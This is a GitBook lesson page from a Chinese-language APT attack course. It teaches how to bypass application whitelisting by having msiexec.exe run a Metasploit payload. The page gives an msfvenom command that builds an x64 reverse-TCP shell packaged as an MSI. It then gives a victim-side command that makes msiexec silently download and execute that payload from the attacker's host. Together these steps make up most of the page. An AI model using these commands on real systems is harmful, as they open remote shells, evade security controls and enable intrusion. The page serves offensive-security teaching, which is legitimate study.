Micro8
专注APT攻击与防御
Search…
前言
Preface
目录
第一章:生
1-10课
11-20课
21-30课
31-40课
41-50课
51-60课
61-70课
71-80课
第七十一课:基于白名单Msbuild.exe执行payload第一季
第七十二课:基于白名单Installutil.exe执行payload第二季
第七十三课:基于白名单Regasm.exe执行payload第三季
第七十四课:基于白名单Regsvcs.exe执行payload第四季
第七十五课:基于白名单Mshta.exe执行payload第五季
第七十六课:基于白名单Compiler.exe执行payload第六季
第七十七课:基于白名单Csc.exe执行payload第七季
第七十八课:基于白名单Msiexec执行payload第八季
第七十九课:基于白名单Regsvr32执行payload第九季
第八十课:基于白名单Wmic执行payload第十季
81-90课
91-100课
第二章:老(待更新...)
第三章:病(待更新...)
Powered By
GitBook
第七十八课:基于白名单Msiexec执行payload第八季
注:
请多喝点热水或者凉白开,身体特别重要。
Msiexec简介:
Msiexec 是 Windows Installer 的一部分。用于安装 Windows Installer 安装包(MSI),一般在运行 Microsoft Update 安装更新或安装部分软件的时候出现,占用内存比较大。并且集成于 Windows 2003,Windows 7 等。
说明:
Msiexec.exe所在路径已被系统添加PATH环境变量中,因此,Msiexec命令可识别。
基于白名单Msiexec.exe配置payload:
Windows 2003 默认位置:
1
C:
\
WINDOWS
\
system32
\
msiexec.exe
2
C:
\
WINDOWS
\
SysWOW64
\
msiexec.exe
Copied!
攻击机:
192.168.1.4 Debian
靶机:
192.168.1.119 Windows 2003
配置攻击机msf:
配置payload:
1
msfvenom ‐p windows/x64/shell/reverse_tcp
LHOST
=
192.168
.1.4
LPORT
=
53
‐ f msi
>
Micropoor_rev_x64_53.txt
Copied!
靶机执行:
1
C:
\
Windows
\
System32
\
msiexec.exe /q /i http://192.168.1.4/Micropoor_rev
\
_x64_53.txt
Copied!
Micropoor
Previous
第七十七课:基于白名单Csc.exe执行payload第七季
Next
第七十九课:基于白名单Regsvr32执行payload第九季
Last modified
3yr ago
Copy link
Contents
Msiexec简介:
基于白名单Msiexec.exe配置payload:
配置攻击机msf:
配置payload:
靶机执行: